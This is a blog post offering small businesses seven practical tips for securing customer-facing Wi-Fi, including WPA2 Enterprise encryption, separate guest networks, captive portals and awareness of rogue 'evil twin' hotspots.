http://chrisvarnom.com/safety-7-practices-for-securing-customer-facing-wi-fi/

Safety: 7 Practices for Securing Customer-Facing Wi-Fi Author - Chris Varnom at chrisvarnom.com

To be notified of my latest posts please subscribe to my newsletter and to receive free stuff

at http://chrisvarnom.com/newsletter/

Ok, so your boss has just decided that it’s time to hang a “Free Wi-Fi” sign

on the door and now it’s your job to make it happen. Now you’ll be thinking

that this might seem like a deceptively simple task. You can just buy a

business-class router, negotiate a contract with your Internet service

provider (ISP) for adequate bandwidth, and voila, job done. What could

possibly go wrong?

Well as you’re about to find out, from an IT security perspective, quite a lot.

The problems can begin right at the setup stage. The default settings of Wi-

Fi routers straight out of the box aren’t secure. Unless you encrypt your

network, anyone in the vicinity of the router can get onto your network. If

you’re lucky, they will just use your free wireless Internet access for

browsing and downloading. But even this innocent use of your Wi-Fi can

pose a problem, as it can eat up your bandwidth allowance and have an

effect on your ability to connect to applications and websites. Worse still,

people with bad intentions could access your PCs and your file servers,

hijacking any accounts that don’t use SSL encryption or capturing your

passwords. These include your Facebook and Twitter accounts and

popular Web email clients.

And unfortunately, even protecting your Wi-Fi network with the ever popular

Wi-Fi Protected Access (WPA) encryption, a former standard, and one still

in widespread use today, doesn’t help to keep out the people that intend

breaking into your network. WPA was broken into several years ago and

there are numerous automated programs you can get from Internet sites

that boast “hack any Wi-Fi network.”

Unfortunately, this isn’t just about you, it’s also about protecting your

customers. The 2013 Identity Fraud Report conducted in the US found that

the number of identity fraud victims shot up to 12.6 million consumers in

2013, that’s one out of every 20 U.S. consumers. Cybercriminals are

busily “sniffing” for sensitive data information over unsecured Wi-Fi

connections.

It can get even more complicated depending on the ISP you have. Some

big ISPs are automatically turning customers’ cable modems into public Wi-

Fi hotspots accessible to anyone with an account login from that ISP.

They’re not even asking permission. So if you see a hotspot appear in

range of your devices labeled “xfinityWi-Fi” or “attWi-Fi,” it might well be

originating from your own cable modem.

This is raising hackles as well as security concerns among customers. You

need to carefully evaluate whether instead of being an endpoint on a

network, you would be okay with being a node on a public network. You

will be, unless you opt out, so it’s important that you think about it, make an

informed decision, and, if necessary, take action to inform your carrier of

your decision.

Here are seven tips on how to extend Wi-Fi to customers while keeping

yourself - and them - secure:

Tip No. 1: Use Enterprise WPA2 encryption. IEEE 802.11i, also known

as WPA2, uses IEEE 802.1x for mutual authentication between the client

and the network and Advanced Encryption Standard (AES) for data

encryption. WPA2 is the stronger big brother of WPA, and provides the

best Wi-Fi protection to date. But to confuse matters, you can deploy

WPA2 in either Personal or Enterprise mode. Most wireless routers support

both modes.

Although the Personal mode is easier to set up, it has recently been

cracked. However, to deploy WPA2 Enterprise mode, you need a RADIUS

server, which requires time and expertise to set up. Another option is to use

a hosted service that deploys WPA2 in enterprise mode. And always create

a long and strong passphrase when setting up the encryption, using no

words or phrases that might be in a dictionary.

Tip No. 2: Create a separate private Wi-Fi network just for guests. You

might be tempted, because it’s much easier, to simply allow your

customers to log onto the Wi-Fi network your employees use. Don’t do it.

Once onto your internal network, cyber criminals can easily hack into

supposedly protected files or applications, and steal data from your

company.

To protect your business, create a separate private wireless network-

most business-class routers will let you do this and encrypt it, just as you

encrypted your internal Wi-Fi network. If your router has already been

configured to send out a second, public signal by your ISP, theoretically,

this shouldn’t interfere with your ability to set up a guest network yourself.

However, the jury appears to be out regarding whether it could adversely

impact your available bandwidth. Again, consider opting out if you are at all

concerned about this.

Tip No. 3: Create a “captive portal” for guests. You don’t want to make

it too difficult for your customers to get onto your network. But you should

have what’s called a “captive portal,” which requires Internet users to agree

to terms of service before proceeding to the Internet. Although the captive

portal’s primary purpose is authenticating users, it offers other benefits.

You can create a landing page tailored to your business, assign access

codes that collect information about users, and put into place traffic controls

to limit bandwidth.

Tip No. 4: Be aware of other hotspots that appear in the vicinity. “Evil

Twin” and “Ad Hoc” hotspots can try to mimic yours to trick your customers

into logging onto them. Once an Evil Twin gains access to a computer, it

can launch a “man in the middle” attack that can be devastating to an

individual or a business.

Again, your ISP might be complicating matters by using your router to

create a public hotspot for your area. Although, theoretically, this gives your

customers more Wi-Fi choices, it also increases the opportunity for

cybercriminals to confuse users with rogue networks. If this makes you at

all uncomfortable, you should opt out of your carrier being able to use your

router as a public hotspot. Again, if you don’t take any action, your

carrier will make you part of its plan to build a national network of

public hotspots.

Tip No. 5: Use MAC authentication for your employee network. MAC

authentication locks down your employee network even more securely by

restricting network access to pre-registered devices only. Yes, setup is a bit

of a hassle, as you have to assign MAC addresses to specific wireless

cards, but it will stop unauthorized devices from accessing your secured

network.

Tip No. 6: Don’t let your customers access illegal or offensive

sites. You should always block sites with illegal or objectionable content on

both your employee and customer Wi-Fi connections to prevent possibly

illegal or dubious situations from arising on your premises.

Tip No. 7: Never underestimate your bandwidth needs. Make sure that

your equipment (or service provider) allows you to scale up as your users

demand more bandwidth. After all, nothing is more frustrating than slow Wi-

Fi for either your employees or your customers. ISPs claim that

piggybacking on customers’ routers to create public hot spots will not

impact customers’ bandwidth, be on the lookout for degradations in service

levels and be prepared to contact your ISP to shout if you detect any.

By putting the right security measures in place, your business can reap all

the benefits of offering Wi-Fi to customers while protecting both your own

data and applications and those of customers.